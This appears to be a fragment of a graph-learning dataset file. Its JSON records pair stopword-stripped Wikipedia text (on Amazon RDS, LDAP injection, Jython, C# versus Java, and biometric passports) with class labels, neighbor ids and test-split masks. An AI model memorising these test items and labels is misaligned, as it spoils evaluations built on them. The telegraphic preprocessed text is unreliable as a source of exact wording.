existing applications simply gain hands-on experience amazon rds amazon rds creates saves automated backups rds db instances first snapshot db instance contains data full db instance subsequent snapshots incremental maximum retention period 35 days multi-az rds deployments backups done standby instance i/o activity suspended amount time may experience elevated latencies minutes backups database instances managed aws management console using amazon rds apis using aws cli since 1 june 2017 stop aws rds instances aws management console aws cli 7 days time 7 days automatically started since september 2018 rds instances protected accidental deletion increase db space supported decrease allocated space additionally least six-hour period new allocation done december 2017 amazon rds supports 36 db instance types 27 latest generation support different types workloads several vendors provide cloud database services similar amazon rds oracle offers oracle cloud database service supporting oracle database technology microsoft offers windows azure sql service supporting microsoft sql relational databases competitors supporting mysql include rackspace cloud databases google cloud sql hp cloud mysql xeround cloud database cleardb",
    "neighbors": [
      11392,
      8962,
      2051,
      8451,
      6027,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      11030,
      2328,
      1816,
      4377,
      8986,
      5660,
      11038,
      6307,
      10020,
      11556,
      3366,
      2170,
      5159,
      2217,
      9766,
      6444,
      10286,
      7983,
      8495,
      3121,
      7352,
      2496,
      4289,
      11201,
      9286,
      1224,
      5960,
      8520,
      10185,
      4429,
      590,
      7248,
      1362,
      467,
      9682,
      7802,
      7512,
      8921,
      8539,
      735,
      6367,
      4194,
      11646,
      5732,
      10340,
      1001,
      10090,
      3819,
      5612,
      7660,
      7022,
      8683,
      6769,
      8181,
      7415,
      3450,
      5499,
      253,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 10682,
    "label": 4,
    "text": "LDAP_injection:ldap injection computer security ldap injection code injection technique used exploit web applications could reveal sensitive user information modify information represented ldap lightweight directory access protocol data stores ldap injection exploits security vulnerability application manipulating input parameters passed internal search add modify functions application fails properly sanitize user input possible attacker modify ldap statement ldap injection occurs user input properly sanitized used part dynamically generated ldap filter results potential manipulation ldap statements performed ldap server either view modify bypass authentication credentials ldap injection known attack prevented simple measures client supplied input must checked/sanitized characters may result malicious behavior input validation verify input checking presence special characters part ldap query language known data types legal values etc white list input validation also used detect unauthorized input passed ldap query example query constructed validate user credentials purpose logging codice_1 typical use case user would provide user credentials filter would used validate credentials however attacker enter crafted input variable codice_2 codice_3 value password finished query become codice_4 first portion query processed ldap server codice_5 always evaluates true allowing attacker gain access system without needing provide valid user credentials",
    "neighbors": [
      899,
      5404,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10683,
    "label": 9,
    "text": "Jython:jython jython implementation python programming language designed run java platform implementation formerly known jpython 1999 jython programs import use java class except standard modules jython programs use java classes instead python modules jython includes almost modules standard python programming language distribution lacking modules implemented originally c. example user interface jython could written swing awt swt jython compiles java bytecode intermediate language either demand statically jython initially created late 1997 replace c java performance-intensive code accessed python programs moving sourceforge october 2000 python software foundation awarded grant january 2005 jython 2.5 released june 2009 recent release jython 2.7.1 released 1 july 2017 compatible python 2.7 although jython implements python language specification differences incompatibilities cpython reference implementation python version 2.2 jython including standard library released python software foundation license v2 older versions covered jython 2.0 2.1 license jpython 1.1.x software license command line interpreter available apache software license",
    "neighbors": [
      3712,
      7684,
      2181,
      4358,
      7176,
      910,
      10526,
      5031,
      7980,
      5677,
      7983,
      6067,
      9011,
      5048,
      6074,
      10683,
      572,
      7485,
      10173,
      3519,
      5567,
      9665,
      10684,
      7750,
      4171,
      6860,
      7887,
      3920,
      10193,
      1363,
      4960,
      1250,
      2658,
      5987,
      3560,
      3561,
      3562,
      7146,
      5612,
      8554,
      11625,
      5872,
      8825,
      9714,
      9078,
      3705,
      2045,
      3966,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 10684,
    "label": 9,
    "text": "Comparison_of_C_Sharp_and_Java:comparison c sharp java article compares two programming languages c java focus article mainly languages features comparison necessarily also consider features platforms libraries detailed comparison platforms please see comparison java .net platforms c java similar languages typed statically strongly manifestly object-oriented designed semi-interpretation runtime just-in-time compilation curly brace languages like c c++ languages statically typed class-based object orientation java primitive types special object-oriented could defined using language also share common ancestor reference types java reference types derive common root type c unified type system types besides unsafe pointers ultimately derive common root type consequently types implement methods root type extension methods defined object type apply types even primitive int literals delegates allows c unlike java support objects encapsulation reference types java compound types synonymous reference types methods defined type unless also class reference type c concepts encapsulation methods decoupled reference requirement type support methods encapsulation without reference type reference types support virtual methods specialization however languages support many built-in types copied passed value rather reference java calls types primitive types called simple types c primitive/simple types typically native support underlying processor architecture c simple types implement several interfaces consequently offer many methods directly instances types even literals c type names also merely aliases common language runtime clr types c system.int64 type exactly type long type difference former canonical .net name latter c alias java offer methods directly primitive types instead methods operate primitive values offered companion primitive wrapper classes fixed set wrapper classes exist wraps one fixed set primitive types example java long type reference type wraps primitive long type type however java c support signed integers bit widths 8 16 32 64 bits use name/aliases types except 8-bit integer called byte java sbyte signed byte c c supports unsigned addition signed integer types unsigned types byte ushort uint ulong 8 16 32 64 bit widths respectively unsigned arithmetic operating types supported well example adding two unsigned integers uints still yields uint result long signed integer java feature unsigned integer types particular java lacks primitive type unsigned byte instead java byte type sign extended common source bugs confusion unsigned integers left java deliberately james gosling believed programmers would understand unsigned arithmetic works.in programming language design one standard problems language grows complex nobody understand one little experiments tried asking people rules unsigned arithmetic c. turns nobody understands unsigned arithmetic c works obvious things people understand many people n't understand c type literal notation high-precision 28 decimal digits decimal arithmetic appropriate financial monetary calculations contrary float double data types decimal fractional numbers 0.1 represented exactly decimal representation float double representations numbers often non-terminating binary expansions making representations prone round-off errors java lacks built-in type java library feature arbitrary precision decimal type considered language type support usual arithmetic operators rather reference type must manipulated using type methods see arbitrary-size/precision numbers languages offer library-defined arbitrary-precision arithmetic types arbitrary-size integers decimal point calculations java data type arbitrary precision decimal point calculations c type working complex numbers languages number operations performed advanced numeric types limited compared built-in ieee 754 floating point types instance none arbitrary-size types support square root logarithms c allows library-defined types integrated existing types operators using custom implicit/explicit conversions operator overloading see example section integration library-defined types languages feature native char character datatype simple type although char type used bit-wise operators performed promoting char value integer value operation thus result bitwise operation numeric type character languages languages treat strings immutable objects reference type languages type contains several methods manipulate strings parse format etc languages regular expressions considered external feature implemented separate classes languages libraries define classes working dates calendars different cultures java java.util.date mutable reference type whereas c system.datetime struct value type c additionally defines timespan type working time periods languages support date time arithmetic according different cultures c allows programmer create user-defined value types using struct keyword unlike classes like standard primitives value types passed assigned value rather reference also part object either field boxed stored array without memory indirection normally exists class types value types notion null value used arrays without initialization always come implicit default constructor essentially fills struct memory space zeroes programmer define additional constructors one arguments value types virtual method tables fixed memory footprint implicitly sealed however value types frequently implement interfaces example built-in integer types implement several interfaces apart built-in primitive types java include concept value types languages define enumerations implemented fundamentally different ways enumerations one area tools designed automatically translate code two languages java c converters fail c implemented enumerations manner similar c wrappers around bit-flags implemented primitive integral types int byte short etc. performance benefits improves interaction c/c++ compiled code provides fewer features lead bugs low-level value types directly cast enumeration type allowed c language therefore seen syntactic sugar contrast java implements enumerations full featured collection instances requiring memory aiding interaction c/c++ code providing additional features reflection intrinsic behavior implementation language described table c java programmers use enumerations switch statement without conversion string primitive integer type however c disallows implicit fall-through unless case statement contain code common cause hard-to-find bugs fall-through must explicitly declared using goto statement c implements object-oriented method pointers form delegates delegate special type capture type-safe reference method reference stored delegate-type variable passed method delegate parameter later invocation c delegates support covariance contravariance hold reference signature-compatible static method instance method anonymous method lambda expression delegates confused closures inline functions concepts related reference closure/inline function must captured delegate reference useful delegate always reference inline function also reference existing static instance methods delegates form basis c events confused either delegates deliberately left java considered unnecessary detrimental language potential performance issues instead alternative mechanisms used wrapper pattern resembles delegates c allows client access one client-defined methods known interface one mechanism another use adapter objects using inner classes designers java argued better solution bound method references see also example c delegates equivalent java constructs c allows value/primitive/simple types lifted allow special null value addition type native values type lifted adding suffix type name equivalent using nullable generic type type lifted conversions implicitly defined convert values base lifted type lifted type compared null tested hasvalue also lifted operators implicitly automatically defined based non-lifted base — exception boolean operators — null argument propagate result java support type lifting concept built-in primitive types corresponding wrapper types support null value virtue reference types classes according java spec attempt dereference null reference must result exception thrown run-time specifically nullpointerexception would make sense dereference otherwise definition points object memory also applies attempting unbox variable wrapper type evaluates null program throw exception object unboxed thus boxed value take part subsequent computation following example illustrates different behavior c lifted*operator propagates null value operand java unboxing null reference throws exception c lifted operators defined propagate null unconditionally one operands null specifically boolean operators lifted support ternary logic thus keeping impedance sql java boolean operators support ternary logic implemented base class library c features late bound dynamic type supports no-reflection dynamic invocation interoperability dynamic languages ad-hoc binding example document object models dynamic type resolves member access dynamically runtime opposed statically/virtual compile time member lookup mechanism extensible traditional reflection fall-back mechanism several use cases dynamic type c java support late-bound type use cases c dynamic type different corresponding constructs java see also example interoperability dynamic languages java precludes pointers pointer-arithmetic within java runtime environment java language designers reasoned pointers one main features enable programmers put bugs code chose support java allow directly passing receiving objects/structures to/from underlying operating system thus need model objects/structures specific memory layout layouts frequently would involve pointers java communication underlying operating system instead based upon java native interface jni communication with/adaptation underlying operating system handled external glue layer c allow use pointers corresponding pointer arithmetic c language designers concerns pointers could potentially used bypass strict rules object access thus c default also precludes pointers however pointers needed calling many native functions pointers allowed explicit unsafe mode code blocks methods use pointers must marked unsafe keyword able use pointers compiler requires /unsafe switch allow compiling code assemblies compiled using /unsafe switch marked may execute explicitly trusted allows using pointers pointer arithmetic directly pass receive objects to/from operating system native apis using native memory layout objects also isolating potentially unsafe code specifically trusted assemblies languages references central concept instances classes reference directly evident language syntax per se languages support concept weak references instance referenced weak references eligible garbage collection references languages feature exposed associated libraries even though really core runtime feature along weak references java soft references much like weak references jvm deallocate softly-referenced objects memory needed arrays collections concepts featured languages syntax used declare access arrays identical except c added syntax declaring manipulating multidimensional arrays multidimensional arrays cases increase performance increased locality one pointer dereference instead one every dimension array case jagged arrays however since array element access multidimensional array requires multiplication/shift two dimensions advantage random access scenarios another difference entire multidimensional array allocated single application operator new jagged arrays require loops allocations every dimension however java provides syntactic construct allocating jagged array regular lengths loops multiple allocations performed virtual machine need explicit source level languages feature extensive set collection types includes various ordered unordered types lists maps/dictionaries sets etc java also supports syntax c/c++ languages allow automatic boxing unboxing i.e allow implicit casting primitive types corresponding reference types c primitive types subtypes object type java true given primitive type corresponding wrapper type specific relationship except autoboxing unboxing act syntactic sugar interchanging done intentionally maintain backward compatibility prior versions java automatic casting allowed programmer worked two separate sets types primitive types wrapper reference type hierarchy difference following consequences first c primitive types define methods override object tostring method java task accomplished primitive wrapper classes secondly java extra cast needed whenever one tries directly dereference primitive value boxed automatically expression integer 42 .tostring convert integer literal string java 42.tostring performs operation c latter one instance call primitive value 42 former one instance call object type java.lang.integer finally another difference java makes heavy use boxed types generics see languages considered curly brace languages c/c++ family overall syntaxes languages similar syntax statement expression level almost identical obvious inspiration c/c++ tradition type definition level classes interfaces minor differences exist java explicit extending classes implementing interfaces c infers kind types new class/interface derives c supports features java extent also evident syntax specifies keywords grammar rules java languages evolved language designers languages faced situations wanted extend languages new keywords syntax new keywords particular may break existing code source level i.e older code may longer compile presented compiler later version language language designers keen avoid regressions designers two languages following different paths addressing problem java language designers avoided new keywords much possible preferring instead introduce new syntactic constructs legal reuse existing keywords new contexts way n't jeopardize backward compatibility example former found loop extended accept iterable types example latter found extends especially super keywords reused specifying type bounds generics introduced java 1.5 one time java 1.4 new keyword assert introduced reserved keyword potential render previously valid code invalid instance code used assert identifier designers chose address problem four-step solution 1 introducing compiler switch indicates java 1.4 later used 2 marking assert keyword compiling java 1.4 later 3 defaulting 1.3 avoid rendering previous non 1.4 aware code invalid 4 issue warnings keyword used java 1.3 mode order allow developers change code c language designers introduced several new keywords since first version however instead defining keywords global keywords define context sensitive keywords means even introduced among others partial yield keywords c 2.0 use words identifiers still valid clash possible use keyword use identifier given context thus present c syntax fully backward compatible source code written previous version without specifying language version used c java designed ground object-oriented languages using dynamic dispatch syntax similar c++ c++ turn derives c neither language superset c c++ however c allows class definition split across several source files using feature called partial classes part must marked keyword partial parts must presented compiler part single compilation parts reference members parts parts implement interfaces one part define base class feature useful code generation scenarios user interface ui design code generator supply one part developer another part compiled together developer thus edit part without risk code generator overwriting code later time unlike class extension mechanism partial class allows circular dependencies among parts guaranteed resolved compile time java corresponding concept languages allow inner classes class defined lexically inside another class however language inner classes rather different semantics java unless inner class declared static reference instance inner class carries reference outer class result code inner class access static non-static members outer class create instance non-static inner class instance embracing outer class must named done via new new-operator introduced jdk 1.3 outerclassinstance.new outer.innerclass done class reference instance outer class c inner class conceptually normal class sense outer class acts namespace thus code inner class access non-static members outer class unless explicit reference instance outer class programmers declare inner class private allow outer class access java provides another feature called local classes anonymous classes defined within method body generally used implement interface one two methods typically event handlers however also used override virtual methods superclass methods local classes access outer method local variables declared final c satisfies use-cases providing anonymous delegates see event handling c also provides feature called anonymous types/classes rather different java concept name allows programmer instantiate class providing set names properties class expression initialize types properties inferred types expressions implicitly-declared classes derived directly object c multicast-delegates used events events provide support event-driven programming implementation observer pattern support specific syntax define events classes operators register unregister combine event handlers see information events implemented java operator overloading user-defined casts separate features aim allow new types become first-class citizens type system using features c types complex decimal integrated usual operators like addition multiplication work new types unlike c++ c restrict use operator overloading prohibiting operators new || variations compound statements like += compound operators call overloaded simple operators like -= calling java include operator overloading custom conversions order prevent abuse feature keep language simple c also includes indexers considered special case operator overloading like c++ operator parameterized get/set properties indexer property named uses one parameters indexes indices objects type java include indexers common java pattern involves writing explicit getters setters c programmer would use indexer c java object fields initialized either variable initializers expressions assigned variables defined constructors special subroutines executed object created addition java contains instance initializers anonymous blocks code arguments run explicit implicit call superclass constructor constructor executed c initializes object fields following order creating object fields may applicable e.g object static fields derived fields defined object direct class base field term fields defined one object superclasses note object representation memory contains fields defined class superclasses even fields superclasses defined private guaranteed field initializers take effect constructors called since instance constructor object class superclasses called field initializers called however potential trap object initialization virtual method called base constructor overridden method subclass may reference field defined subclass field may initialized constructor subclass contains field initialization called constructor base class java order initialization follows like c new object created calling specific constructor within constructor first statement may invocation another constructor omitted call argumentless constructor superclass added implicitly compiler otherwise either another overloaded constructor object class called explicitly superclass constructor called former case called constructor call another constructor either object class subclass chain sooner later ends call one constructors superclass another constructor called causes direct invocation superclass constructor forth object class instance variables defined object class initialized even variable initializers explicitly defined variables variables initialized default values note instance variables defined superclasses already initialized point initialized superclass constructor called either constructor code variable initializers performed constructor code implicitly default values java variable initializers executed according textual order source file finally constructor body executed ensures proper order initialization i.e fields base class finish initialization initialization fields object class begins two main potential traps java object initialization first variable initializers expressions contain method calls since methods reference variable defined class method called variable initializer reference variable defined variable initialized since initialization order corresponds textual order variable definitions variable would initialized value prescribed initializer would contain default value another potential trap method overridden derived class called base class constructor lead behavior programmer would expect object derived class created according initialization order body base class constructor executed variable initializers evaluated body derived class constructor executed overridden method called base class constructor however reference variables defined derived class yet initialized values specified initializers set derived class constructor latter issue applies c well less critical form since c methods overridable default languages mainly use garbage collection means reclaiming memory resources rather explicit deallocation memory cases object holds resources different kinds memory file handles graphical resources etc. must notified explicitly application longer uses c java offer interfaces deterministic disposal c java since java 7 feature automatic resource management statements automatically invoke disposal/close methods interfaces using special designator first parameter method c allows method act member method type first parameter extension foreign class purely syntactical extension method must declared static defined within purely static class method must obey member access restriction like method external class thus static methods break object encapsulation extension active within scopes namespace static host class imported since java 8 java similar feature called default methods methods body declared interfaces opposed c extension methods java default methods instance methods interface declare definition default methods classes implement interface optional class define method default definition used instead c extension methods java default methods allow class override default implementation extension/default method respectively languages override achieved defining method class use alternate implementation method c scope rules defines matching method found class takes precedence matching extension method java class declared implement interface default method assumed default methods implementions unless class implements method related partial classes c allows partial methods specified within partial classes partial method intentional declaration method several restrictions signature restrictions ensure definition provided class part method every call safely erased feature allows code provide large number interception points like template method gof design pattern without paying runtime overhead extension points used another class part compile time java corresponding concept methods c non-virtual default must declared virtual explicitly desired java non-static non-private methods virtual virtuality guarantees recent override method always called incurs certain runtime cost invocation invocations normally inlined require indirect call via virtual method table however jvm implementations including oracle reference implementation implement inlining commonly called virtual methods java methods virtual default although sealed using final modifier disallow overriding way let derived classes define new unrelated method name means default java explicitly enabled c new methods may defined derived class name signature base class method called superclass reference object deepest overridden implementation base class method called according specific subclass object referenced cases subclass introduces method name signature method already present base class problems occur java mean method derived class implicitly override method base class even though may intent designers either class mitigate c requires method intended override inherited method override keyword must specified otherwise method hide inherited method keyword absent compiler warning effect issued silenced specifying new keyword avoids problem arise base class extended non-private method i.e inherited part namespace whose signature already use derived class java similar compiler check form override method annotation compulsory absence compilers provide comment method overridden java possible prevent reassignment local variable method parameter using keyword applying keyword primitive type variable causes variable become immutable however applying reference type variable prevents another object assigned prevent data contained object mutated c 7 possible prevent reassignment method parameter using keyword however keyword used local variables java applying parameter prevents parameter reassigned different value still possible mutate data contained object languages support essential feature const-correctness exists c/c++ makes method constant java defines word constant arbitrarily field variables capital-only variables names separated underscore parameter considered constant although may case primitive data type immutable class like c method declared returning ienumerable ienumerator generic versions interfaces implemented using yield syntax form limited compiler-generated continuations drastically reduce code needed traverse generate sequences although code generated compiler instead feature also used implement infinite sequences e.g. sequence fibonacci numbers java equivalent feature instead generators typically defined providing specialized implementation well-known collection iterable interface compute element demand generator used statement must implement interface java.lang.iterable see also example fibonacci sequence c also explicit interface implementation allows class specifically implement methods interface separate class methods provide different implementations two methods name signature inherited two base interfaces either language method property c specified name signature multiple interfaces members clash class designed implements interfaces implementation default implement common method interfaces separate implementations needed methods serve separate purposes return values differ interfaces c explicit interface implementation solve problem though allowing different results method depending current cast object java way solve problem refactoring one interfaces avoid name clashes arguments primitive types e.g int double method passed value java whereas objects passed reference means method operates copies primitives passed instead actual variables contrary actual objects cases changed following example object string changed object class changed c possible enforce reference ref keyword similar c++ sense c. feature c particularly useful one wants create method returns one object java trying return multiple values method unsupported unless wrapper used case named ref java supports checked exceptions along unchecked exceptions c supports unchecked exceptions checked exceptions force programmer either declare exception thrown method catch thrown exception using try-catch clause checked exceptions encourage good programming practice ensuring errors dealt however anders hejlsberg chief c language architect argues extent experiment java shown worthwhile except small example programs one criticism checked exceptions encourage programmers use empty catch block catch exception e silently swallows exceptions rather letting exceptions propagate higher-level exception-handling routine cases however exception chaining applied instead re-throwing exception wrapper exception example object changed access database instead file could caught re-thrown since caller may need know inner workings object however programmers agree stance james gosling others maintain checked exceptions useful misusing caused problems silently catching exceptions possible yes must stated explicitly exception versus unchecked exceptions allow nothing default ignored code must written explicitly ignore also differences two languages treating try-finally statement finally block always executed even try block contains control-passing statements like throw return java may result unexpected behavior try block left return statement value finally block executed afterward also left return statement different value c resolves problem prohibiting control-passing statements like return break finally block common reason using try-finally blocks guard resource managing code thus guaranteeing release precious resources finally block c features using statement syntactic shorthand common scenario dispose method object using always called rather subtle difference moment stack trace created exception thrown java stack trace created moment exception created exception statement always contain constructor stack-trace matter often foo called c hand stack-trace created moment throw executed code exception contain stack-trace first throw-line catching exception two options case exception rethrown throw rethrow original exception original stack throw e would created new stack trace java allows flow control leave finally block try statement regardless way entered cause another control flow statement return terminated mid-execution example code return statement within try block causes control leave thus finally block executed actual return happens however finally block also performs return thus original return caused entered executed method returns 1 rather 0 informally speaking tries return 0 finally returns 1 c allow statements allow control flow leave finally block prematurely except throw particular return allowed goto allowed target label outside finally block continue break allowed nearest enclosing loop outside finally block field generics two languages show superficial syntactical similarity deep underlying differences generics java language-only construction implemented compiler generated classfiles include generic signatures form metadata allowing compiler compile new classes runtime knowledge generic type system generics part jvm instead generics classes methods transformed compiling via process termed type erasure compiler replaces generic types raw version inserts casts/checks appropriately client code type methods used resulting byte code contain references generic types parameters see also generics java language specification intentionally prohibits certain uses generics necessary allow implementing generics type erasure allow migration compatibility c builds support generics virtual execution system i.e. language feature language merely front-end cross-language generics support clr compiling generics verified correctness code generation implement generics deferred class-load time client code code invoking generic methods/properties fully compiled safely assume generics type-safe called reification runtime unique set type parameters generic class/method/delegate encountered first time class loader/verifier synthesize concrete class descriptor generate method implementations generation method implementations reference types considered one type reference types safely share implementations merely purpose implementing code different sets reference types still unique type descriptors method tables merely point code following list illustrates differences java c managing generics exhaustive c allows generics directly primitive types java instead allows use boxed types type parameters e.g. list integer instead list int comes cost since values need boxed/unboxed used need heap-allocated however generic type specialized array type primitive type java example list int allowed several third-party libraries implemented basic collections java backing primitive arrays preserve runtime memory optimization primitive types provide java type erasure design motivated design requirement achieve migration compatibility confused backward compatibility particular original requirement … clean demonstrable migration path collections apis introduced java 2 platform designed new generic collections passable methods expected one pre-existing collection classes c generics introduced language preserving full backward compatibility preserve full migration compatibility old code pre c 2.0 runs unchanged new generics-aware runtime without recompilation migration compatibility new generic collection classes interfaces developed supplemented non-generic .net 1.x collections rather replacing addition generic collection interfaces new generic collection classes implement non-generic collection interfaces possible prevents use new generic collections pre-existing non-generic aware methods methods coded use collection classes covariance contravariance supported languages java use-site variance allows single generic class declare members using co- contravariance c define-site variance generic interfaces delegates variance unsupported directly classes supported implementation variant interfaces c also use-site covariance support methods delegates closure inline function captures variables lexical scope c supports closures anonymous methods lambda expressions full-featured closure semantics java anonymous inner classes remain preferred way emulate closures java 8 become new standard verbose construction approach also differences compared real closures notably controlled access variables enclosing scopes final members referenced java 8 however introduces lambdas fully inherit current scope fact introduce new scope reference method passed around later execution problem arises method references variables/parameters lexical scope c closures access variable/parameter lexical scope java anonymous inner classes references final members lexical scope allowed thus requiring developer mark variables make available state possibly requiring boxing c java feature special type in-line closures called lambdas anonymous methods signature body name mainly used specify local function-valued arguments calls methods technique mainly associated functional programming c unlike java allows use lambda functions way define special data structures called expression trees whether seen executable function data structure depends compiler type inference type variable parameter assigned cast lambdas expression trees play key roles language integrated query linq c namespaces similar c++ unlike package names java namespace way tied location source file strictly necessary java source file location mirror package directory structure conventional organization languages allow importing classes e.g. import java.util java allowing class referenced using name sometimes classes name exist multiple namespaces packages classes referenced using fully qualified names importing selected classes different names java allows importing single class e.g. import java.util.list c allows importing classes new local name using following syntax using console system.console also allows importing specializations classes form using intlist system.collections.generic.list int languages static import syntax allows using short name static methods/fields class e.g. allowing foo bar foo statically imported another class c static class syntax confused static inner classes java restricts class contain static methods c 3.0 introduces extension methods allow users statically add method type e.g. allowing foo.bar bar imported extension method working type foo sun microsystems java compiler requires source file name must match public class inside c allows multiple public classes file puts restrictions file name c 2.0 later allows splitting class definition several files using partial keyword source code java public class always source file c source code files logical units separation tightly related unlike java c implements conditional compilation using preprocessor directives also provides conditional attribute define methods called given compilation constant defined way assertions provided framework feature method debug.assert evaluated debug constant defined since version 1.4 java provides language feature assertions turned runtime default enabled using -enableassertions -ea switch invoking jvm languages include thread synchronization mechanisms part language syntax .net framework 4.0 new task-based programming model introduced replace existing event-based asynchronous model api based around task task classes tasks composed chained convention every method returns task name postfixed async c 5 set language compiler extensions introduced make easier work task model language extensions included notion async methods await statement make program flow appear synchronous syntactic sugar c compiler generates state-machine handles necessary continuations without developers think java supports threads since jdk 1.0 java offers high versatility running threads often called tasks done implementing functional interface java.lang.runnable interface defining single void no-args method demonstrated following example similar c java higher level mechanism working threads executors execute asynchronous tasks also manage group subprocesses threads executorservices instance handled pool executorservice instance reused hood revenant tasks possible runs many concurrent tasks programmer wants throughout life-cycle application using single executor service instance first thread-example looks like using executors executorservice instance also supports callable interface another single method interface like runnable signature contained method callable returns value way lambda expression must also return value calling method get blocks current thread waits callable completes returning value example web page content adequately support applications field mathematical financial computation several language features exist java strictfp keyword enables strict floating-point calculations region code strict floating-point calculations require even platform offers higher precision calculations intermediate results must converted single/double ensures strict floating-point calculations return exactly result platforms without strict floating-point platform implementation free use higher precision intermediate results calculation c allows implementation given hardware architecture always use higher precision intermediate results available i.e c allow programmer optionally force intermediate results use potential lower precision single/double although java floating-point arithmetic largely based ieee 754 standard binary floating-point arithmetic certain features unsupported even using strictfp modifier exception flags directed roundings abilities mandated ieee standard 754 see criticism java floating point arithmetic c provides built-in decimal type higher precision less range java/c double decimal type 128-bit data type suitable financial monetary calculations decimal type represent values ranging 1.0 × 10 approximately 7.9 × 10 28-29 significant digits structure uses c operator overloading decimals manipulated using operators *and like primitive data types types provided java allow arbitrary-precision representation decimal numbers integer numbers respectively java standard library classes deal complex numbers biginteger complex types provided c allow representation manipulation arbitrary-precision integers complex numbers respectively structures use c operator overloading instances manipulated using operators like primitive data types c standard library classes deal arbitrary-precision floating point numbers see software arbitrary-precision arithmetic c help mathematical applications checked unchecked operators allow enabling disabling run-time checking arithmetic overflow region code c language integrated query linq set features designed work together allow in-language querying abilities distinguishing feature c java linq consists following features java native interface jni feature allows java programs call non-java code however jni require code called follow several conventions imposes restrictions types names used means extra adaption layer legacy code java often needed adaption code must coded non-java language often c c++ java native access jna allows easier calling native code requires writing java code comes performance cost addition third party libraries provide java-component object model com bridging e.g. jacob free j-integra com proprietary .net platform invoke p/invoke offers ability allowing calls c microsoft terms unmanaged code metadata attributes programmer control exactly parameters results marshalled thus avoiding external glue code needed equivalent jni java p/invoke allows almost complete access procedural apis win32 posix limited access c++ class libraries addition .net framework also provides .net-com bridge allowing access com components first-class .net objects c also allows programmer disable normal type-checking safety features clr enables use pointer variables using feature programmer must mark code using unsafe keyword jni p/invoke unsafe code equally risky features exposing possible security holes application instability advantage unsafe managed code p/invoke jni allows programmer continue work familiar c environment accomplish tasks otherwise would require calling unmanaged code assembly program library using unsafe code must compiled special switch marked enables runtime environments take special precautions executing potentially harmful code java programming language designed execute java platform via java runtime environment jre java platform includes java virtual machine jvm common set libraries jre originally designed support interpreted execution final compiling option jre environments execute fully least partially compiled programs possibly adaptive optimization java compiler produces java bytecode upon execution bytecode loaded java runtime either interpreted directly compiled machine instructions executed c designed execute common language runtime clr clr designed execute fully compiled code c compiler produces common intermediate language instructions upon execution runtime loads code compiles machine instructions target architecture example illustrating copy text one line time one file another using languages c allows library-defined types integrated existing types operators using custom implicit/explicit conversions operator overloading illustrated following example example illustrates java c used create invoke instance class implemented another programming language deepthought class implemented using ruby programming language represents simple calculator multiply two input values b calculate method invoked addition conventional way java graalvm virtual machine capable run implemented programming language example illustrates fibonacci sequence implemented using two languages c version takes advantage c generator methods java version takes advantage stream interface method references java c examples use k r style code formatting classes methods statements",
    "neighbors": [
      2048,
      6160,
      541,
      9245,
      5677,
      566,
      572,
      8262,
      1610,
      1611,
      9804,
      2658,
      7273,
      7274,
      3705,
      3736,
      155,
      5796,
      10413,
      5806,
      3761,
      3765,
      10435,
      716,
      6860,
      8397,
      7894,
      5872,
      2804,
      2304,
      4358,
      5896,
      9482,
      6411,
      6414,
      10510,
      10011,
      10526,
      11559,
      9008,
      7479,
      10043,
      5952,
      5961,
      3920,
      10586,
      4960,
      11617,
      9587,
      9078,
      8059,
      380,
      1931,
      910,
      5521,
      11674,
      1952,
      8609,
      5031,
      6074,
      10683,
      10684,
      5567,
      9665,
      963,
      11212,
      11219,
      5588,
      4057,
      4572,
      1501,
      479,
      4069,
      3560,
      3561,
      3562,
      6640,
      9714,
      3573,
      1016,
      3577,
      2556,
      2045,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 10685,
    "label": 4,
    "text": "Biometric_passport:biometric passport biometric passport also known e-passport epassport digital passport traditional passport embedded electronic microprocessor chip contains biometric information used authenticate identity passport holder uses contactless smart card technology including microprocessor chip computer chip antenna power chip communication embedded front back cover centre page passport passport critical information printed data page passport repeated machine readable lines stored chip public key infrastructure pki used authenticate data stored electronically passport chip making expensive difficult forge security mechanisms fully correctly implemented many countries moving towards issue biometric passports malaysia first country issue biometric passports 1998 december 2008 60 countries issuing passports increasing 120 june 2017 currently standardised biometrics used type identification system facial recognition fingerprint recognition iris recognition adopted assessment several different kinds biometrics including retinal scan document chip characteristics documented international civil aviation organization icao doc 9303 icao9303 icao defines biometric file formats communication protocols used passports digital image usually jpeg jpeg2000 format biometric feature actually stored chip comparison biometric features performed outside passport chip electronic border control systems e-borders store biometric data contactless chip includes minimum 32 kilobytes eeprom storage memory runs interface accordance iso/iec 14443 international standard amongst others standards intend interoperability different countries different manufacturers passport books national identity cards netherlands albania brazil fully icao9303 compliant biometric travel documents however others united states passport card biometric passports protection mechanisms avoid and/or detect attacks assure interoperability functionality security mechanisms listed icao german federal office information security bsi specified several test cases test specifications updated every new protocol covering details starting paper used ending chip included since introduction biometric passports several attacks presented demonstrated privacy proponents many countries question protest lack information exactly passports chip contain whether impact civil liberties main problem point data passports transferred wireless rfid technology become major vulnerability although could allow id-check computers obtain person information without physical connection may also allow anyone necessary equipment perform task personal information passport numbers chip encrypted information might wind wrong hands 15 december 2006 bbc published article british epassport citing stories adding adding future identity information society fidis network research team body security experts funded european union also come epassport scheme ... stating european governments forced document people dramatically decreases security increases risk identity theft security measures designed untrusted citizens provers scientific security community recently also addressed threats untrustworthy verifiers corrupt governmental organizations nations using poorly implemented unsecure electronic systems new cryptographic solutions private biometrics proposed mitigate threats mass theft identity scientific study yet implemented biometric passports planned except denmark ireland uk eu passports would digital imaging fingerprint scan biometrics placed rfid chips combination biometrics aims create unrivaled level security protection fraudulent identification papers technical specifications new passports established european commission specifications binding schengen agreement parties i.e eu countries except ireland uk three four european free trade association countries – iceland norway switzerland countries obliged implement machine readable facial images passports 28 august 2006 fingerprints 29 june 2009 european data protection supervisor stated current legal framework fails address possible relevant issues triggered inherent imperfections biometric systems currently british irish biometric passports use digital image fingerprinting german passports printed 1 november 2007 contain two fingerprints one hand addition digital photograph romanian passports also contain two fingerprints one hand netherlands also takes fingerprints eu member plans store fingerprints centrally according eu requirements nations signatories schengen acquis required add fingerprint biometrics eu nations passport prices issued since may 2009 costs 7500 lekë €60 valid 10 years contains fingerprints bearer photo data written passport issued since 5 january 2012 valid 10 years adults 5 years minors issued since june 2012 costs 1.500,00 pesos valid 10 years issued since july 2012 contains digital images fingerprints photo electronic signature passport holder valid 10 years issued since october 2005 costs au 293.. contains personal information colour photo page including digitized photograph australia use fingerprinting incoming passengers valid 10 years adults 5 